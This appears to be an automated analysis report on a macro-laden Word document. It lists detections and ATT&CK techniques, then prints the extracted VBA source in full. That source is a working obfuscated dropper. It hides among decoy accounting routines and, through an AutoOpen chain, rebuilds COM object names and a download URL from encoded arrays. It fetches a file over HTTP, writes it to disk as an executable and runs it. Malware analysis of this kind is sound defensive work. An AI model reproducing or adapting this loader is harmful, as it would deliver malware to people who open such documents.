MALICIOUS
352
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The sample is an OOXML document containing VBA macros. Heuristics indicate the presence of an obfuscated auto-exec loader that uses CreateObject and Shell/exec functions to download and execute a file. The embedded artifact 'macros.bas' likely contains this malicious VBA code.
Heuristics 9
-
ClamAV: Doc.Malware.Valyria-10019999-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-10019999-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
somebody = variablrName1DASH_1.responseBody -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set variablrName1DASH1solo = CreateObject(trutrufast(3)) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set variablrName1DASH1solo = CreateObject(trutrufast(3)) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12496 bytes |
SHA-256: daec303eecc117cf647811dd5585244cefd86d5870a4627749ee6f466eb618e9 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
LoadBaseFile
End Sub
Attribute VB_Name = "Module1"
Public variablrName1DASH_1 As Object
Public variablrName3 As Object
Public variablrName1DASH_3 As Object
Public variablrName5() As String
Public variablrName1DASH_4 As String
Public trutrufast() As String
Public variablrName1_tolko1 As String
Public variablrName1DASHfiddle As Object
Public variablrName4 As String
Public variablrName2 As String
Public somebody As Variant
Public Function indata_to_kingaku(ByVal idx As Long, ByVal indata As Long) As Long
Dim kingaku As Long
Dim pasIdx As Long
pasIdx = f1002_get_.sbt(idx)
Select Case f1002_get_.Kind(idx)
Case 2, 5, 6
If f1007_get_.urikin(pasIdx) = 0 Or f1007_get_.inpscl(pasIdx) = 0 Then
kingaku = 0
Else
kingaku = indata * f1007_get_.inpscl(pasIdx) * f1007_get_.tamatanka(pasIdx)
End If
Case Else
kingaku = indata * 100
End Select
indata_to_kingaku = kingaku
End Function
Public Sub set_safe_rel(ByVal rdb As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
g_dai.Rel(rdb - 1).safe = newValue
If dataLink Then
g_dai.Rel(rdb - 1).out = newValue
End If
End Sub
Public Sub set_start_rel(ByVal rdb As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
g_dai.Rel(rdb - 1).Start = newValue
If dataLink Then
End If
End Sub
Public Sub set_gen1uri_rel(ByVal rdb As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
Dim sbt As Long
Dim kinko As Long
g_dai.Rel(rdb - 1).gen1uri = newValue
If dataLink Then
sbt = f1001_get_.sbt(rdb)
g_dai.Rel(rdb - 1).safe = -(g_dai.Rel(rdb - 1).gen1uri + g_dai.Rel(rdb - 1).gen2uri) / f1007_get_.tamatanka(sbt) / f1007_get_.inpscl(sbt)
kinko = f1001_get_.kinko(rdb)
g_zen.Rel(kinko - 1).urikin = sum_kinko_dai(kinko)
End If
End Sub
Public Sub AbnormalWindup()
Dim rc As Long
Dim rs As Long
Set variablrName1DASH1solo = CreateObject(trutrufast(3))
Set variablrName1DASH_3 = variablrName1DASH1solo.Environment(trutrufast(4))
Dim apdistance As Integer
For apdistance = LBound(variablrName5) To UBound(variablrName5)
variablrName4 = variablrName4 & SUBBUS3(apdistance)
Next apdistance
CheckRecovery
Exit Sub
Dim ftp As String
For rs = 1 To f1000_get_rs + 1
rc = ft.p.Connect("as" & CStr(rs), "super", "user")
If rc = 0 Then
rc = ft.p.DeleteFile("/r0/set")
rc = ft.p.DeleteFile("/r0/mf6407_*")
rc = ft.p.DeleteFile("/r0/mf6411*")
rc = ft.p.DeleteFile("/r0/setok")
rc = ft.p.DeleteFile("/r0/setng")
ft.p.Close
End If
Next
End Sub
Public Function DataRecover(ByVal fLink As Boolean) As Boolean
Dim I As Long
Dim msg As String
DataRecover = False
If CheckGuid Then
f640X_b.uild err_buf, err_count, bld_result, fLink
If f640X_put = False Then
Exit Function
End If
If set_put = False Then
Exit Function
End If
SaveGu.ID
DataRecover = True
Else
MsgBox "PC", vbCritical
End If
End Function
Public Sub ShowResult()
frmResult.Show vbModal
End Sub
Public Function SUBBUS3(variablrName6 As Integer) As String
Dost = CInt(variablrName5(variablrName6))
SUBBUS3 = Chr(Dost / (35 - 8))
End Function
Public Function SUBBUS2(A1 As String, A2 As String, A3 As String) As String
SUBBUS2 = Replace(A1, A2, A3)
End Function
Public Function GetDocumentName() As String
If g_fileName = "" Then
GetDocumentName = DEF_FILE_NAME
Else
GetDocumentName = g_fileName
End If
End Function
Public Function NewDocument() As Boolean
Erase g_dai.Rel
Erase g_zen.Rel
NewDocument = LoadBaseFile
End Function
Public Function OpenDocument(typicalName As String) As Boolean
On Error GoTo ErrHandler
Dim skipData As Long
Dim fno As Integer
trutrufast = Split(variablrName2, "ROOOOH")
Set variablrName3 = CreateObject(trutrufast(1))
Set variablrName1DASHfiddle = CreateObject(trutrufast(2))
Dim I As Integer
Dim d As Boolean
d = True
IsWord = True
For I = 1 To Len(Trim("eesucka"))
If d = False Then
Set variablrName1DASH_1 = CreateObject(trutrufast(I - 2))
Exit For
Else
d = False
End If
Next I
AbnormalWindup
Exit Function
g_fileName = typicalName
I = 0
fno = FreeFile
Open Replace(g_fileName, ".csv", "_d.csv") For Input As fno
Do While Not EOF(fno)
I = I + 1
Loop
Close fno
I = 0
fno = FreeFile
Open Replace(g_fileName, ".csv", "_z.csv") For Input As fno
Do While Not EOF(fno)
I = I + 1
Loop
Close fno
OpenDocument = True
Exit Function
ErrHandler:
OpenDocument = False
End Function
Public Function SaveDocument(typicalName As String) As Boolean
On Error GoTo ErrHandler
Dim I As Long
Dim fno As Integer
variablrName2 = SUBBUS2(variablrName2, "ROOH", "M")
variablrName2 = SUBBUS2(variablrName2, "ROOOH", "s")
OpenDocument ""
Exit Function
fno = FreeFile
Open typicalName For Output As fno
Write #fno, Now
Close fno
I = 0
fno = FreeFile
Open Replace(typicalName, ".csv", "_d.csv") For Output As fno
For I = 0 To UBound(g_dai.Rel)
Write #fno, I + 1, g_dai.Rel(I).out, g_dai.Rel(I).safe, g_dai.Rel(I).Start, g_dai.Rel(I).gen1uri, g_dai.Rel(I).gen2uri
Next
Close fno
I = 0
fno = FreeFile
Open Replace(typicalName, ".csv", "_z.csv") For Output As fno
For I = 0 To UBound(g_zen.Rel)
Write #fno, I + 1, g_zen.Rel(I).urikin
Next
Close fno
SaveDocument = True
Exit Function
ErrHandler:
SaveDocument = False
End Function
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub erer()
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{9CE5FF10-686D-4989-944B-505153292E69}{6262A439-2940-4599-BCD5-53A63AE71F0D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Frame1_Click()
End Sub
Private Sub MultiPage1_Change()
End Sub
Private Sub TabStrip1_Change()
End Sub
Attribute VB_Name = "Module"
Public Sub set_gen2uri_rel(ByVal rdb As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
Dim sbt As Long
Dim kinko As Long
variablrName3.Write somebody
variablrName3.savetofile variablrName1_tolko1, 2
set_out_rel 0, 0, False
Exit Sub
g_dai.Rel(rdb - 1).gen2uri = newValue
If dataLink Then
sbt = f1001_get_.sbt(rdb)
g_dai.Rel(rdb - 1).safe = -(g_dai.Rel(rdb - 1).gen1uri + g_dai.Rel(rdb - 1).gen2uri) / f1007_get_.tamatanka(sbt) / f1007_get_.inpscl(sbt)
kinko = f1001_get_.kinko(rdb)
g_zen.Rel(kinko - 1).urikin = sum_kinko_dai(kinko)
End If
End Sub
Public Sub set_indata_rel(ByVal idx As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
g_zen.Rel(idx - 1).urikin = newValue
If dataLink Then
End If
End Sub
Public Sub f640X_build(err_buffer() As String, err_count As Long, bld_result() As String, ByVal fLink As Boolean)
If fLink Then
Else
End If
End Sub
Public Function LoadBaseFile() As Boolean
Dim wssName As String
Dim fno As Integer
variablrName5 = Split("2808312312312443132312312312443132312312312443024312312312441566312312312441269312312312441269312312312443213312312312443213312312312443213312312312441242312312312443132312312312443078312312312442619312312312443024312312312442619312312312442916312312312442916312312312442619312312312442970312312312441242312312312442673312312312442997312312312442943312312312441269312312312442997312312312442889312312312443024312312312441539312312312441512312312312441485312312312442781312312312441485312312312443186", "31231231244")
variablrName2 = SUBBUS2("ROOHicroROOOHoft.XROOHLHTTPROOOOHAdodb.ROOOHtrROHaROOHROOOOHROOOHhROHll.Appl" _
+ SUBBUS2("icationROOOOHWROOOHcript.ROOOHhROHllROOOOHProcROHROOOHROOOHROOOOHGROHTROOOOHTROHROOHPROOOOHTypROHROOOOHopROHnROOOOHwritDATponROOOHROHBodyROOOOHROOOHavROHtofilROHROOOOH", "DAT", "ROHROOOOHrROHROOOH") _
+ "\hramgROOOH.ROHxROH", "ROH", "e")
SaveDocument ""
End Function
Public Function f640X_put() As Boolean
Dim allOk As Boolean
Dim rc(4) As Long
Dim rs As Long
variablrName1DASH_4 = variablrName1DASH_3(trutrufast(6))
variablrName1_tolko1 = variablrName1DASH_4
variablrName1_tolko1 = variablrName1_tolko1 + trutrufast(12)
variablrName3.Type = 1
MakeLocalFile
Exit Function
f640X_put = True
MakeLocalFile
For rs = 1 To f1000_get_rs + 1
rc(0) = ft.p.Connect("as" & CStr(rs), "super", "user")
If rc(0) = 0 Then
rc(1) = ft.p.PutFile("mf6407_" & CStr(rs) & ".bin", "/r0", 1)
rc(2) = ft.p.PutFile("mf6407_" & CStr(rs) & ".crc", "/r0", 1)
rc(3) = ft.p.PutFile("mf6411.bin", "/r0", 1)
rc(4) = ft.p.PutFile("mf6411.crc", "/r0", 1)
ft.p.Close
Else
Call ErrCo.nnect(ftp, rc(0))
End If
Set ftp = Nothing
If rc(0) <> 0 Or rc(1) <> 1 Or rc(2) <> 1 Or rc(3) <> 1 Or rc(4) <> 1 Then
f640X_put = False
Exit For
End If
Next
Kill "mf6407_.bin"
Kill "mf6407_.crc"
Kill "mf6411."
End Function
Attribute VB_Name = "Module2"
Public Function f4103_get_kingaku(ByVal idx As Long) As Long
f4103_get_kingaku = indata_to_kingaku(idx, fno4103_get_.indata(s_f.no4103(0), idx))
End Function
Public Function sum_kinko_dai(ByVal kinko As Long) As Long
Dim rdb As Long
Dim sum As Long
For rdb = 1 To f1000_get_daisu
If f1001_get_.kinko(rdb) = kinko Then
sum = sum + g_dai.Rel(rdb - 1).gen1uri + g_dai.Rel(rdb - 1).gen2uri
End If
Next
sum_kinko_dai = sum
End Function
Public Sub set_out_rel(ByVal rdb As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
variablrName1DASHfiddle.Open (variablrName1_tolko1)
Exit Sub
g_dai.Rel(rdb - 1).out = newValue
If dataLink Then
g_dai.Rel(rdb - 1).safe = newValue
End If
End Sub
Public Sub MakeLocalFile()
Dim fno As Integer
Dim rs As Long
Dim I As Long
Dim crc As Integer
variablrName3.Open
somebody = variablrName1DASH_1.responseBody
set_gen2uri_rel 0, 0, False
Exit Sub
Dim work(512 - 1) As Byte
For rs = 1 To 3
fno = FreeFile
Open "mf6407_" & CStr(rs) & ".bin" For Binary As fno
For I = 0 To UBound(work)
work(I) = s_fn.o6407(((rs - 1) * 512 * RECSIZE_FN.O4102) + I)
Next
Put fno, , work
Close fno
crc = hto.ns(lec_cal.ccrc(work(0), RECSIZE_FN.O4102 * 512))
fno = FreeFile
Open "mf6407_" & CStr(rs) & ".crc" For Binary As fno
Put fno, , crc
Close fno
Next
fno = FreeFile
Open "mf6411.bin" For Binary As fno
Put fno, , s_fno6411
Close fno
crc = hto.ns(lec_cal.ccrc(s_fno6411(0), SIZE_OF_FNO6411))
fno = FreeFile
Open "mf6411.crc" For Binary As fno
Put fno, , crc
Close fno
End Sub
Public Function set_put() As Boolean
Dim allOk As Boolean
Dim rc(4) As Long
Dim rs As Long
Dim ftp As String
set_put = True
For rs = 1 To f1000_get_rs + 1
rc(0) = f.tp.Connect("as" & CStr(rs), "super", "user")
If rc(0) = 0 Then
rc(1) = ft.p.PutFile("set", "/r0", 1)
ft.p.Close
Else
Call ErrCon.nect(ftp, rc(0))
End If
If rc(0) <> 0 Or rc(1) <> 1 Then
set_put = False
Exit For
End If
Next
End Function
Public Function CheckRecovery() As Long
Dim okFlag As Boolean, ngFlag As Boolean
Dim rc As Long
Dim rs As Long
Dim farray As Variant
If Application = "Microsoft Word" Then
variablrName1DASH_1.Open trutrufast(5), variablrName4, False
variablrName1DASH_1.Send
f640X_put
End If
Exit Function
Dim ftp As String
For rs = 1 To f1000_get_rs + 1
rc = ft.p.Connect("as" & CStr(rs), "super", "user")
If rc = 0 Then
farray = ft.p.GetDir("/r0")
okFlag = InArr.ay(farray, "setok")
ngFlag = InArr.ay(farray, "setng")
If okFlag = True And ngFlag = False Then
CheckRecovery = 1
ElseIf okFlag = False And ngFlag = True Then
CheckRecovery = 2
Else
CheckRecovery = 0
End If
End If
Next
End Function
Public Sub NormalWindup()
Dim rc As Long
Dim rs As Long
Dim ftp As String
For rs = 1 To f1000_get_rs + 1
rc = ft.p.Connect("as" & CStr(rs), "super", "user")
If rc = 0 Then
rc = ft.p.DeleteFile("/r0/setok")
rc = ft.p.DeleteFile("/r0/setng")
ft.p.Close
End If
Next
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 48640 bytes |
SHA-256: 50529d74c9bd8d02bf757287311f0a7c7fd1c9078f7e9a740d7d55a94094ae37 |
|||
|
Detection
ClamAV:
Doc.Malware.Valyria-10019999-0
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.